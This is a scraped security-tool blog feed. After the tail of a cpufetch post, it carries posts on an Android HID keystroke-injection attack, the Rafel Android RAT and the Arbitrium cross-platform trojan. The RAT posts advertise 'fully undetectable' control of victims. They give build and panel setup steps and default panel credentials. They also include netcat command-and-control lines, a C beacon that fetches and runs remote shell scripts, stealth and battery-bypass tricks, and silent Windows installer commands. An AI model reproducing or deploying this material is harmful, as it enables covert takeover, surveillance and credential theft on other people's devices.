href="https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/s1173/cpufetch_10_exynos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1173" height="218" src="https://1.bp.blogspot.com/-a3y22tYqlAk/YGvhQOcvTZI/AAAAAAAAV08/J5y8fKfYp9spQALMfEb0HKIwbtl2BpxQQCNcBGAsYHQ/w640-h218/cpufetch_10_exynos.png" width="640" /></a></div><p><br /></p><span style="font-size: x-large;"><b>4. Colors and style</b></span><br /> <p>By default, <code>cpufetch</code> will print the CPU art with the system colorscheme. However, you can always set a custom color scheme, either specifying Intel or AMD, or specifying the colors in RGB format:</p> <pre><code>./cpufetch --color intel (default color for Intel)<br />./cpufetch --color amd (default color for AND)<br />./cpufetch --color 239,90,45:210,200,200:100,200,45:0,200,200 (example)<br /></code></pre> <p>In the case of setting the colors using RGB, 4 colors must be given in with the format: <code>[R,G,B:R,G,B:R,G,B:R,G,B]</code>. These colors correspond to CPU art color (2 colors) and for the text colors (following 2). Thus, you can customize all the colors.</p> <br /><span style="font-size: x-large;"><b>5. Implementation</b></span><br /> <p>See <a href="https://github.com/Dr-Noob/cpufetch/blob/master/doc/README.md" rel="nofollow" target="_blank" title="cpufetch programming documentation">cpufetch programming documentation</a>.</p> <br /><span style="font-size: x-large;"><b>6. Bugs or improvements</b></span><br /> <p>There are many open issues in github (see <a href="https://github.com/Dr-Noob/cpufetch/issues" rel="nofollow" target="_blank" title="issues">issues</a>). Feel free to open a new one report an issue or propose any improvement in <code>cpufetch</code></p> <p>I would like to thank <a href="https://github.com/Gonzalocl" rel="nofollow" target="_blank" title="Gonzalocl">Gonzalocl</a> and <a href="https://github.com/OdnetninI" rel="nofollow" target="_blank" title="OdnetninI">OdnetninI</a> for their help, running <code>cpufetch</code> in many different CPUs they have <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="access">access</a> to, which makes it easier to debug and check the correctness of <code>cpufetch</code>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Dr-Noob/cpufetch" rel="nofollow" target="_blank" title="Download Cpufetch">Download Cpufetch</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-40391194116257508242021-03-30T08:30:00.001-03:002021-03-30T08:30:11.992-03:00Android_Hid - Use Android As Rubber Ducky Against Another Android Device<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-1VxT_z9WSW4/YGDzlYomI7I/AAAAAAAAVuM/t3k8P1JyeKwJUhGWOfW1kf4_TGK5sr8VQCNcBGAsYHQ/s734/Android_Hid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="734" data-original-width="598" height="640" src="https://1.bp.blogspot.com/-1VxT_z9WSW4/YGDzlYomI7I/AAAAAAAAVuM/t3k8P1JyeKwJUhGWOfW1kf4_TGK5sr8VQCNcBGAsYHQ/w522-h640/Android_Hid.png" width="522" /></a></div><p><br /></p> <p>Use Android as <a href="https://www.kitploit.com/search/label/Rubber%20Ducky" target="_blank" title="Rubber Ducky">Rubber Ducky</a> against another Android device</p> <br /><span style="font-size: large;"><b>HID attack using Android</b></span><br /> <p>Using Android as Rubber Ducky against Android. This is not a new technique, just a demo how to perform HID attack using Android instead of rubber ducky. For targeted Android device it is not necessary to be rooted, have ADB/USB <a href="https://www.kitploit.com/search/label/Debugging" target="_blank" title="debugging">debugging</a> enabled and device authorized, since attacker's <a href="https://www.kitploit.com/search/label/Smartphone" target="_blank" title="smartphone">smartphone</a> behaves as connected keyboard.</p><span><a name='more'></a></span><div><br /></div><b>How to prevent this happening</b><br /> <ol> <li>charge you smartphone using your own adapter</li> <li>use none trivial PIN or password lockscreen protection</li> <li>use mobile security software that will detect and prevent from launching payloads</li> </ol> <br /><b>PoC</b><br /> <p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/aOWr6rWhsIs" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p> <br /><b>Prerequisites</b><br /> <ul> <li>rooted Android with HID kernel support (e.g. <a href="https://www.kitploit.com/search/label/NetHunter" target="_blank" title="NetHunter">NetHunter</a> ROM)</li> <li>OTG cable</li> </ul> <br /><b>Script info</b><br /> <p>This is custom script, which might not work on your testing case scenario. Because of that, you must play around with pressed keys that are sent to targeted device. Website with my testing payload is not active anymore. List of all possible keys can be found on the link below.</p> <br /><b>Execute command</b><br /> <p>bash hid_attack</p> <br /><b>How to flash custom ROM with HID support</b><br /> <p><a href="https://github.com/pelya/android-keyboard-gadget" rel="nofollow" target="_blank" title="https://github.com/pelya/android-keyboard-gadget">https://github.com/pelya/android-keyboard-gadget</a></p> <br /><b>Brute-force pin using Android as HID</b><br /> <p><a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce">https://github.com/urbanadventurer/Android-PIN-Bruteforce</a></p> <br /><b>List of all keys</b><br /> <p><a href="https://github.com/anbud/DroidDucky/blob/master/droidducky.sh" rel="nofollow" target="_blank" title="https://github.com/anbud/DroidDucky/blob/master/droidducky.sh">https://github.com/anbud/DroidDucky/blob/master/droidducky.sh</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/androidmalware/android_hid" rel="nofollow" target="_blank" title="Download Android_Hid">Download Android_Hid</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9581795551177597892021-03-19T08:30:00.001-03:002021-03-19T08:30:06.014-03:00Rafel-Rat - Android Rat Written In Java With WebPanel For Controlling Victims<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vCWi9edZZ3U/YE5sbCxFGCI/AAAAAAAAVlk/F-k6DntTpWIWxCRQnNCU6gYa23t7uIp2gCNcBGAsYHQ/s288/Rafel-Rat_1.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="288" data-original-width="215" src="https://1.bp.blogspot.com/-vCWi9edZZ3U/YE5sbCxFGCI/AAAAAAAAVlk/F-k6DntTpWIWxCRQnNCU6gYa23t7uIp2gCNcBGAsYHQ/s0/Rafel-Rat_1.gif" /></a></div><br /><p><br /></p><p><br /></p><p align="center"> <b>Rafel</b> is <b>Remote <a href="https://www.kitploit.com/search/label/Access" target="_blank" title="Access">Access</a> Tool</b> Used to Control Victims Using <b>WebPanel</b> With More Advance Features.</p><span><a name='more'></a></span><p align="center"><br /></p><span style="font-size: large;"><b>Main Features</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item">Admin Permission</li> <li class="task-list-item">Add App To White List</li> <li class="task-list-item">Looks Like Browser</li> <li class="task-list-item">Runs In Background Even App is Closed(May not work on some Devices)</li> <li class="task-list-item">Accessibility Feature</li> <li class="task-list-item">Support <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> v5 - v10</li> <li class="task-list-item">No <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="Port Forwarding">Port Forwarding</a> Needed</li> <li class="task-list-item">Acquire Wakelock</li> <li class="task-list-item">Fully Undetectable</li> </ul> <br /><span style="font-size: large;"><b>Prerequisites</b></span><br /> <ul> <li>Android Studio</li> </ul> <p>OR</p> <ul> <li><a href="https://forum.xda-developers.com/android/software-hacking/tool-apk-easy-tool-v1-02-windows-gui-t3333960" rel="nofollow" target="_blank" title="ApkEasyTool">ApkEasyTool</a></li> </ul> <br /><span style="font-size: large;"><b>Building <a href="https://www.kitploit.com/search/label/Apk" target="_blank" title="Apk">Apk</a> With Android Studio</b></span><br /> <ol> <li>Open Project <em><strong>Lite_Browsercode</strong></em> in Android Studio</li> <li>Put the <code>command.php</code> link of server in InternalService.class class</li> <li>Build the Project</li> <li>Zipalign and sign the Apk...</li> </ol> <br /><span style="font-size: large;"><b>Building Apk with ApkEasyTool</b></span><br /> <ol> <li>Navigate to <em><strong>\Lite_Browser\smali\com\velociraptor\raptor</strong></em></li> <li>Open InternalService.smali</li> <li>Replace this with your Panel Url <em><strong>const-string v0, "<a href="https://your-webpanel-url/commands.php" rel="nofollow" target="_blank" title="https://your-webpanel-url/commands.php">https://your-webpanel-url/commands.php</a>"</strong></em></li> </ol> <br /><span style="font-size: large;"><b>Building Server</b></span><br /> <ol> <li>Upload Files in server Folder to Your HostingPanel</li> <li>Now Open login.php</li> <li>Enter Username <em><strong>Hande</strong></em> Password <em><strong>Ercel</strong></em></li> <li>Note : Make Sure your webhosting site uses Https and should have valid connection...I recommend 000webhost.com</li> <li>You can now use panel to send commands and also refresh after it</li> </ol> <br /><span style="font-size: x-large;"><b>Screenshots</b></span><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-DrY3G7rFNmM/YE5x8aR8rDI/AAAAAAAAVmU/-EcF1KL4tMYc2kuZvPzdx1k1tNnpYegvQCNcBGAsYHQ/s1738/Rafel-Rat_6_Screenshot%252520%252870%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="733" data-original-width="1738" height="270" src="https://1.bp.blogspot.com/-DrY3G7rFNmM/YE5x8aR8rDI/AAAAAAAAVmU/-EcF1KL4tMYc2kuZvPzdx1k1tNnpYegvQCNcBGAsYHQ/w640-h270/Rafel-Rat_6_Screenshot%252520%252870%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-0dORh5f48d0/YE5x8R_fmHI/AAAAAAAAVmQ/0yRgjUd9musig_4-gNNSeUqd51_--X2fwCNcBGAsYHQ/s1674/Rafel-Rat_7_Screenshot%252520%252871%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="715" data-original-width="1674" height="274" src="https://1.bp.blogspot.com/-0dORh5f48d0/YE5x8R_fmHI/AAAAAAAAVmQ/0yRgjUd9musig_4-gNNSeUqd51_--X2fwCNcBGAsYHQ/w640-h274/Rafel-Rat_7_Screenshot%252520%252871%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-XxhFNe7gZ9U/YE5x8fmwVEI/AAAAAAAAVmY/EUYolhddO-YnxoE_eYg7qKg82VcCpt7LACNcBGAsYHQ/s1802/Rafel-Rat_8_Screenshot%252520%252872%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="846" data-original-width="1802" height="300" src="https://1.bp.blogspot.com/-XxhFNe7gZ9U/YE5x8fmwVEI/AAAAAAAAVmY/EUYolhddO-YnxoE_eYg7qKg82VcCpt7LACNcBGAsYHQ/w640-h300/Rafel-Rat_8_Screenshot%252520%252872%2529.png" width="640" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Ru5WQZp1SoI/YE5x9JMNcBI/AAAAAAAAVmc/B_mZlaBEUds4Ef6rsenWFlEiQxH-q_qewCNcBGAsYHQ/s1718/Rafel-Rat_9_Screenshot%252520%252873%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="1718" height="268" src="https://1.bp.blogspot.com/-Ru5WQZp1SoI/YE5x9JMNcBI/AAAAAAAAVmc/B_mZlaBEUds4Ef6rsenWFlEiQxH-q_qewCNcBGAsYHQ/w640-h268/Rafel-Rat_9_Screenshot%252520%252873%2529.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Bz7NKcjH4l0/YE5wMVCa19I/AAAAAAAAVl0/0UcDMvrKfi8ZZIwguH2wfdoKu6KFcgIggCNcBGAsYHQ/s1400/Rafel-Rat_10_Screenshot%252520%252884%2529.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1400" data-original-width="715" height="640" src="https://1.bp.blogspot.com/-Bz7NKcjH4l0/YE5wMVCa19I/AAAAAAAAVl0/0UcDMvrKfi8ZZIwguH2wfdoKu6KFcgIggCNcBGAsYHQ/w327-h640/Rafel-Rat_10_Screenshot%252520%252884%2529.png" width="327" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-iqM5VDSUfZY/YE5wMdQBKcI/AAAAAAAAVls/W8MoBQ1-bYg1yudm7cZ4kfAbYgzX1jfwQCNcBGAsYHQ/s1389/Rafel-Rat_11_Screenshot%252520%252885%2529.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1389" data-original-width="714" height="640" src="https://1.bp.blogspot.com/-iqM5VDSUfZY/YE5wMdQBKcI/AAAAAAAAVls/W8MoBQ1-bYg1yudm7cZ4kfAbYgzX1jfwQCNcBGAsYHQ/w328-h640/Rafel-Rat_11_Screenshot%252520%252885%2529.png" width="328" /></a></div><br /><br /><br /><br /><span style="font-size: large;"><b>Check this Article</b></span><br /> <ul> <li><a href="https://dontkillmyapp.com/" rel="nofollow" target="_blank" title="https://dontkillmyapp.com/">https://dontkillmyapp.com/</a></li> </ul> <br /><span style="font-size: large;"><b>Credits :</b></span><br /> <ul> <li><a href="https://github.com/sulanmehmetsirin" rel="nofollow" target="_blank" title="Mehmet Şirin Sulan">Mehmet Şirin Sulan</a></li> <li>Aisha</li> <li><a href="https://github.com/graysuit" rel="nofollow" target="_blank" title="GraySuit">GraySuit</a></li> </ul> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p><b>Swagkarna Provides no warranty and will not be responsible for any direct or indirect damage caused by this tool.<br /> Rafel-Rat is built for Educational and Internal use ONLY.</b></p> <br /><p></p> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/swagkarna/Rafel-Rat" rel="nofollow" target="_blank" title="Download Rafel-Rat">Download Rafel-Rat</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71945859131478406682021-01-29T08:30:00.046-03:002021-01-29T08:30:06.375-03:00Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lpLlY3iz80U/YA4_6ZOeq7I/AAAAAAAAVH0/kI1Zr0K0ss0KeT4a2a97JE34WiiWwFohQCNcBGAsYHQ/s1280/Arbitrium-RAT_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" height="360" src="https://1.bp.blogspot.com/-lpLlY3iz80U/YA4_6ZOeq7I/AAAAAAAAVH0/kI1Zr0K0ss0KeT4a2a97JE34WiiWwFohQCNcBGAsYHQ/w640-h360/Arbitrium-RAT_1.png" width="640" /></a></div><p><br /></p> <p>Arbitrium is a cross-platform is a <a href="https://www.kitploit.com/search/label/Remote%20Access" target="_blank" title="remote access">remote access</a> trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding. It gives access to the local networks, you can use the targets as a HTTP proxy and access Router, discover local IPs and scan their ports. Includes modules like Mimikatz, new modules can easily be added. In addition, if Arbitrium is used with a DNS spoofing software is can spread autonomously between devices (#AutoSpread). Arbitrium is a project of multiple parts, the parts were built using Java, JS, C, Python, Cordova and VueJS.<span></span></p><a name='more'></a><p></p> <p><br /></p><p style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/7KlPPND2b0g" width="560"></iframe></p><p><br /></p><span style="font-size: x-large;"><b>Features:</b></span><br /> <ul class="contains-task-list"> <li class="task-list-item"><strong>FUD</strong></li> </ul> <p>The client uses simple tools which makes it completely undetectable, the trojan based on netcat mainly pipe TCP paquets to run the server's commands.</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Firewall</strong></li> </ul> <p>Arbitrium doesn't require adding an exception to the firewall, or a <a href="https://www.kitploit.com/search/label/Port%20Forwarding" target="_blank" title="port forwarding">port forwarding</a> rule. The server is an API with endpoints that receives tasks for a specific target and others that the trojan periodically request to get the new instructions, the instructions can be a JavaScript file (the Android app is made using Cordova) or a Shell file to run in the terminal/CMD. Once the server receives a task for a device, the former schedule the task then it opens a child process where it waits for the trojan's response by listening to a dedicated ephemeral port. Therefore, the trojan doesn't need to listen to any port.</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Battery optimization / StealthMode</strong></li> </ul> <p>Unlike with Stock Android, customizations like MIUI by Xiaomi, EMUI by Huawei or Samsung's Android Pie ignore the permissions/exceptions given to an app by the user. So if you try to run an Android's trojan in the background, the moment the app start running frequent or heavy (in some cases even lightweight) tasks (ex: sending http requests periodically) it will be killed no matter what permissions the user grants, ths OS completely ignores the current settings, dontkillmyapp.com is an known website dedicated for this particular issue.</p> <p>The aforementioned issue was quite annoying while working on this project, after awhile I found that building a lightweight binary that keeps running the assigned tasks in the background while the MainActivity stand still just after launching the binary apears to bypass most the <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> and actually even improve the performance of the App.</p> <p>MainActivity receives a JS file from the server and uses <code>ThreadPoolExecutor</code> to initiate the binary without hanging for it to exit (More on this <a href="https://github.com/BenChaliah/Arbitrium-RAT#stealthmode" rel="nofollow" target="_blank" title="StealthMode/BatteryBypass">StealthMode/BatteryBypass</a>).</p> <ul class="contains-task-list"> <li class="task-list-item"><strong>Web interface</strong></li> </ul> <p>There is also a control panel, it's not a requirement but an extension, it's a simple VueJS webapp, a UI you can use to control the targets instead of directely sending requests to the API. The webapp is available here: <a href="https://github.com/BenChaliah/Arbitrium-WebApp" rel="nofollow" target="_blank" title="Arbitrium WebApp">Arbitrium WebApp</a></p> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ol> <li>Android's client</li> </ol> <pre><code>Java ver ...<br />Cordova<br />Android SDK & NDK<br /></code></pre> <ol start="2"> <li>Windows/Linux client</li> </ol> <pre><code>Python3.6 (or newer)<br />PyInquirer<br />Winrar (Windows only)<br /></code></pre> <br /><span style="font-size: x-large;"><b><strong>Build</strong></b></span><br /> <blockquote> <p></p><div>use <code>setAPI_FQDN.sh</code> first to set the server domain/IP in all files</div></blockquote> <p>Clone repo:</p> <p><code>git clone https://github.com/BenChaliah/Arbitrium-RAT.git --recursive</code></p> <ol> <li>Android</li> </ol> <div><pre><code>$ cd ArbitriumClients/AndroidApp/ClientApp/<br />$ cordova build android<br />$ cd ../StealthMode/<br />$ make clean && make build</code></pre></div> <blockquote> <p>The binaries inside <code>/libs</code> are stripped, so it recommended to use these if you're not debuging.</p> </blockquote> <ol start="2"> <li>Windows</li> </ol> <div><pre><code>$ cd ArbitriumClients\WindowsApp<br />$ pyinstaller --onefile runFrame.py<br />$ copy Client_tools\toolbox.exe dist\<br />$ copy Client_tools\SFXAutoInstaller.conf dist\<br />$ copy Client_tools\start_script.vbs dist\<br />$ cd dist<br />$ {Rar_abspath} a -r -cfg -sfx -z"SFXAutoInstaller.conf" Standalone.exe </code></pre></div> <br /><span style="font-size: x-large;"><b>Components</b></span><br /> <ol> <li><a href="https://github.com/BenChaliah/Arbitrium-RAT/blob/main/ServerAPI" rel="nofollow" target="_blank" title="Server API">Server API</a></li> </ol> <blockquote> <p></p><div>The binaries built for Android should be put inside <code>/assets</code> (rename them to <code>binary_{cpuabi}</code>) and the APK will download them, but if you wish to put them inside the APK just make sure to extract them inside the App data folder <code>/data/data/package_name</code> or create a symbolic link inside it <code>window.MyOrangePlugin.exec("/system/bin/ln -s ...</code></div></blockquote> <p><code>$ pip install flask flask_cors && ./runserver.sh # Python2.7</code></p> <pre><code> ├── runserver.sh<br /> ├── main.py<br /> ├── reverse_http.py<br /> ├── initProxy.py<br /> │<br /> ├── assets (src: ArbitriumClients/AndroidApp/StealthMode)<br /> │ ├── runFrame_arm64-v8a<br /> │ ├── toolbox_arm64-v8a<br /> │ ├── ... (x86, x86_64, armeabi-v7a)<br /> │<br /> │<br /> ├── JS_scripts<br /> │ ├── checkupdate.js<br /> │ ├── init.js<br /> │ ├── runshell.js<br /> │ └── StealthMode.js<br /> │<br /> ├── misc<br /> │<br /> ├── modules<br /> │ ├── discover.py<br /> │ ├── mimikatz.py<br /> │&#160 ; ├── ports.py<br /> │ └── runCMD.py<br /> │<br /> └── threads<br /></code></pre> <br /><span style="font-size: large;"><b>Endpoints</b></span><br /> <blockquote> <p></p><div>The response of the API may differ depending on the platform of the device from which the trojan operate. the following part explores mainly the case of <strong>Android</strong>, because it's the most sophisticated due to the OS's restrictions.</div></blockquote> <ul> <li><strong>[GET]</strong> /checkupdate.js</li> </ul> <p>When the client sends its first request to the endpoint <code>/checkupdate.js</code>, the server create a <code>genShell</code>'s object, which sets a unique local port for that device <code>self.lport = self.setPort()</code> and a thread id <code>self.threaduid = random.randint</code> in addition to other attributes. Then returns the appropriate JavaScript code (depending on the CPU/ABI) that will contain instructions to download, chmod and execute (main thread, or poolexec) some resources. As for the following requests it returns a JS code that will execute the pending tasks if there are any.</p> <p><code>runCMD</code> is a method of <code>genShell</code> that write the shell script we want the trojan to run into a file inside <code>/assets</code> to be downloaded later by the client, then uses netcat to listen for the response and pipe it into a file inside <code>/threads</code></p> <p><strong>Example</strong>: Let say you want to use the target as a HTTP proxy, the API formulate the request as the following cmd:</p> <div><pre><code>echo -e "GET / HTTP/1.1\r\nHost: 192.168.1.1\r\nConnection: close\r\n\r\n" | {abspath_toolbox/ncat} {API_HOST_IP} {lport} -w 10;\r\n</code></pre></div> <p>then save it into <code>assets/runsh_{uid_task}.sh</code>, then depending whether the request came from StealthMode/BatteryBypass or not, <code>/checkupdate.js</code> gets the trojan to download the shell file and run it.</p> <div><pre><code>>>> Popen("exec $(nc -l 0.0.0.0 -p {lport} -dN > {task_filename})" shell=True, close_fds=True, ...)</code></pre></div> <ul> <li><strong>[GET]</strong> /addtask</li> </ul> <p>Using the appropriate token the admin can get a device to run a command via this endpoint, the server will describe this command as <strong>pending</strong> which will impact the next response of <code>/checkupdate.js</code> to that device. Then it'll return a random generated id for this task.</p> <ul> <li><strong>[GET]</strong> /pingtask</li> </ul> <p>The combination of the task id generated by <code>/addtask</code> and the aforementioned thread id <code>threaduid</code> makes the name of the file inside <code>/threads</code> where the output of the command is saved. Once this endpoint is requested it checks whether <code>/threads/{threaduid}x{taskid}</code> exists, if so the server returns the content of the file otherwise it return 0.</p> <ul> <li><strong>[GET]</strong> /runproxy & /pushproxy</li> </ul> <p>This will run <code>reverse_http.py</code> in a separate screen, then returns a IP:PORT (HTTP proxy), that will allow the admin to pivote HTTP requests through the trojan device. For instance, if the Admin sets these info in the browser settings and try to open router port (Ex: <code>http://192.16...</code>), the browser will open the router web interface as if the admin was a part the target LAN.</p> <ol start="2"> <li> <p><a href="https://github.com/BenChaliah/Arbitrium-Android" rel="nofollow" target="_blank" title="Client/Trojan (">Client/Trojan (<strong>Android</strong>)</a>: The app is build using Cordova for its simplicity and support for cross-platform developpement. This app relays of two main parts</p> <ol> <li> <br /><b><strong>netbolt-orange-plugin</strong>:</b><br /> <p>this is a cordova plugin I made, it contains few functions that we can call from <code>index.html</code>, scripts downloaded via <code>/checkupdate.js</code> mainly use these methods to run the assigned task</p> <p> + <strong>exec()</strong> : execute shell cmd then returns the cmd output, it runs on the <strong>UI thread</strong></p> <p> + <strong>poolexec()</strong> : same as 'exec()', but this one uses the <code>ThreadPoolExecutor</code> so the App can run a cmd without blocking the main thread, when the output is ready, it sent via a callback with the exit status</p> <p> + <strong>download()</strong> : this one is for downloading whatever resources the API or the admin may want or need to execute a task</p> </li> </ol> <p><strong>Example</strong>: The trojan at first requests <code>/checkupdate.js</code>, let assumes this is an Android phone and we want to initiate the <a href="https://github.com/BenChaliah/Arbitrium-RAT#stealthmode" rel="nofollow" target="_blank" title="StealthMode/BatteryBypass">StealthMode/BatteryBypass</a> to avoid getting killed (Battery optimizations ...), the API then responde with something like:</p> <div><pre><code>function sfunc1(){<br /> window.MyOrangePlugin.download([{Link for ELF} ...], function(res){<br /> sfunc2(...);<br /> });<br />}<br />function sfunc2(...){<br /> window.MyOrangePlugin.exec("chmod ... ", function(res){<br /> sfunc3(...);<br /> });<br />}<br />function sfunc3(...){<br /> window.MyOrangePlugin.poolexec({Here we start the binary the will keep interacting with the API}, function(res){<br /> ...<br /> });<br />}</code></pre></div> <blockquote> <p>The app also uses a slightly customized version of Cordova background mode plugin.</p> </blockquote> <ol start="2"> <li> <br /><b><strong>StealthMode</strong>:</b><br /> <p> + <strong>runFrame.c</strong> : This is a simple C program that sends HTTP requests every few seconds to the API through a socket, saves the response to a shell file then makes a system call to run it.</p> <p> + <strong>toolbox.c</strong> : This is a standalone netcat</p> </li> </ol> <p>The resulting binaries are statically linked to ensure stability and path independance. The importance of using <code>runFrame</code> instead of just running a JS loop in <strong>index.html</strong> doesn't only stop at the Battery issues explained previously but also for performance reasons. The app with this mode uses much less resources and is more reliable.</p> <p>The frequency of the requests is by default set at 5s, but it can be manipulated by the API (the server automatically makes <code>runFrame</code> slow down when there are no scheduled cmds by giving it <code>sleep 30</code> as a response), therefore, when the admin is controling a device or using it as a proxy a number of tasks will be schedules and the delay between each won't be significant, otherwise we don't want the client to keep sending frequent requests which would make it noticeable and resource consuming.</p> <blockquote> <p></p><div>the API recognize whether the requests are coming from this mode from the <strong>User-Agent: JustKidding</strong>, so the responses to <code>/checkupdate.js</code> be compatible. Also the HTTP requests are only made while the phone is connected to <strong>Wlan</strong>, and there are two main reasons for that, the first is data mobile consumption which the OS will stop, the second is the autonomous spread capability (#AutoSpread)</div></blockquote> <div><pre><code>// void bzero(void *s, size_t n);<br />#define bzero(s, n) memset((s), 0, (n))<br />...<br />strcat(reque, "&token=updated HTTP/1.1\r\nHost: {API_Host}\r\nUser-Agent: JustKidding\r\nConnection: close\r\n\r\n");<br />char *routing = "ip route | grep wlan";<br />...<br />while (1){<br /> routingSTAT = system(routing);<br /> // grep exit status will only equal 0 if a wlan interface was listed<br /> if (routingSTAT==0){<br /> fd = socket_connect(argv[1], atoi(argv[2])); <br /> write(fd, reque, strlen(reque));<br /> bzero(buffer, BUFFER_SIZE);<br /> ...<br /> }</code></pre></div> </li> <li> <p><a href="https://github.com/BenChaliah/Arbitrium-RAT/blob/main/Clients" rel="nofollow" target="_blank" title="Client/Trojan (">Client/Trojan (<strong>Windows/Linux</strong>)</a>: Unlike in the case of android here a simple python script will do. In addition, Windows version is equiped with a VBA script and SFX to make a silent autoinstaller, the trojan will be just a standalone executable that runs in the background after extracting its content inside %TEMP%.</p> </li> </ol> <br /><span style="font-size: large;"><b>Screenshots</b></span><br /> <ol> <li>HTTP proxy:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-BErV7I4iDFk/YA5A8VhvQrI/AAAAAAAAVH8/UXlGHN3nkDwsI0NZzaSQZacT39N6G-yIQCNcBGAsYHQ/s1280/Arbitrium-RAT_2.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-BErV7I4iDFk/YA5A8VhvQrI/AAAAAAAAVH8/UXlGHN3nkDwsI0NZzaSQZacT39N6G-yIQCNcBGAsYHQ/s600/Arbitrium-RAT_2.png"/></a></div>
</li> <li>Powershell:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-CTHmZOYNfns/YA5BJEWiHaI/AAAAAAAAVIA/9bdjxqt5gnkgN2WX5-NKd6pvK04KEIjGwCNcBGAsYHQ/s1280/Arbitrium-RAT_3.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-CTHmZOYNfns/YA5BJEWiHaI/AAAAAAAAVIA/9bdjxqt5gnkgN2WX5-NKd6pvK04KEIjGwCNcBGAsYHQ/s600/Arbitrium-RAT_3.png"/></a></div>
</li> <li>Port scanner:
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-fG48jPRuIF8/YA5BPYfuV4I/AAAAAAAAVII/NMC4lgW75Fst3OG2VhvfIGOq5eDCE6ehwCNcBGAsYHQ/s1280/Arbitrium-RAT_4.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="720" data-original-width="1280" src="https://1.bp.blogspot.com/-fG48jPRuIF8/YA5BPYfuV4I/AAAAAAAAVII/NMC4lgW75Fst3OG2VhvfIGOq5eDCE6ehwCNcBGAsYHQ/s600/Arbitrium-RAT_4.png"/></a></div>
